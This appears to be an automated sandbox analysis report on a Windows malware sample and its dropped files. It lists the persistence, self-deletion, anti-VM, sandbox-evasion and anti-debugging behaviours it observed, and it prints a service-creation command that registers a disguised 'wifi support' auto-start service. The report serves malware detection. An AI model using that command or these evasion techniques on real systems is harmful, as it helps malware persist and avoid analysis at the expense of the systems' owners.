                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Deletes itself after installationShow sources
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\og9rnsihj7.exeJump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vfgiwcs:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Found evasive API chain (may stop execution after checking mutex)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: vfgiwcs, 00000013.00000002.349898800.00000000004BB000.00000004.00000020.sdmpBinary or memory string: ASWHOOK#
                      Found evasive API chain (may stop execution after checking locale)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                      Checks if the current machine is a virtual machine (disk enumeration)Show sources
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Contains functionality to detect sleep reduction / modificationsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00406AA0
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C6CF0
                      Found evasive API chain (may stop execution after checking computer name)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
                      Source: C:\Windows\explorer.exe TID: 960Thread sleep time: -34000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 4860Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exe TID: 5972Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4928Thread sleep count: 43 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4928Thread sleep time: -43000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 4524Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 581
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 370
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeAPI coverage: 8.1 %
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeAPI coverage: 6.2 %
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeAPI coverage: 6.1 %
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C6CF0
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FC2A.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9789.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\88E2.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7808.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2473.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3A7E.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\45AA.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2F32.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\54AF.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6AF7.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8017.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeEvaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeEvaded block: after key decision
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeAPI call chain: ExitProcess graph end node
                      Source: explorer.exe, 00000005.00000000.256329492.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
                      Source: explorer.exe, 00000005.00000000.256374084.00000000089B5000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000005.00000000.256329492.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 0000002F.00000002.430423414.00000137968EB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWve MAC Layer LightWeight Filter-0000
                      Source: svchost.exe, 00000007.00000002.554990269.000002A7EAC62000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                      Source: svchost.exe, 0000002F.00000002.430170249.0000013796881000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.428076474.0000013796881000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
                      Source: svchost.exe, 00000007.00000002.554789678.000002A7EAC55000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.399711667.0000000005415000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.399424774.00000000053B7000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.396234617.0000000005413000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.396202885.0000000005412000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000002.430423414.00000137968EB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000005.00000000.249847758.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
                      Source: explorer.exe, 00000005.00000000.273307731.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
                      Source: explorer.exe, 00000005.00000000.257121503.000000000DC20000.00000004.00000001.sdmpBinary or memory string: _VMware_SATAF6
                      Source: explorer.exe, 00000005.00000000.251433696.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
                      Source: explorer.exe, 00000005.00000000.273307731.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
                      Source: explorer.exe, 00000005.00000000.257121503.000000000DC20000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
                      Source: svchost.exe, 00000007.00000002.534797425.000002A7E5629000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`C
                      Source: svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.534535653.000001F3C5A29000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.394128637.0000000005419000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.394453975.0000000005418000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_00419A0C GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C8A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C12E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C14D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C6090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C9930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C9BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C9D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeSystem information queried: ModuleInformation

                      Anti Debugging:

                      barindex
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_00435870 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeCode function: 0_2_005F0042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsCode function: 18_2_00640042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_02070083 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_0208092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exeCode function: 20_2_02080D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeCode function: 22_2_008FC85A push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00401000 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_0040C180 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C1250 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006CC3D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C0D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_006C092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_006C0D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\3136.exeCode function: 29_2_008EA472 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\vfgiwcsProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exeProcess queried: DebugPort
